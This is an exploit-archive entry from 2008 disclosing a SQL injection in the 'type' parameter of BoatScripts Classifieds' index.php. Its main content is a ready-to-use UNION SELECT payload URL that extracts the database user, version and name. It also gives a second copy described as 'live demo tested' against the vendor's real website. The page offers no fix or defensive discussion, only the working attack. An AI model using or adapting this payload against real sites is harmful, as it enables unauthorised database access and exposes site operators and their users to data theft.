BoatScripts Classifieds (index.php type) SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : BoatScripts Classifieds (index.php type) SQL Injection Vulnerability
# Published : 2008-06-18
# Author : Stack
# Previous Title : Carscripts Classifieds (index.php cat) Remote SQL Injection Vulnerability
# Next Title : Comparison Engine Power 1.0 Blind SQL Injection Exploit

BoatScripts Classifieds Sql INjection

By Stack
Home v4-team.com

poc : http://site.co.il/index.php?type=-1/**/UNION/**/SELECT/**/concat(char(58),user(),version(),database())/*
live demo tested
http://www.boatscripts.com/boats/index.php?type=-1/**/UNION/**/SELECT/**/concat(char(58),user(),version(),database())/*

# www.Syue.com [2008-06-18]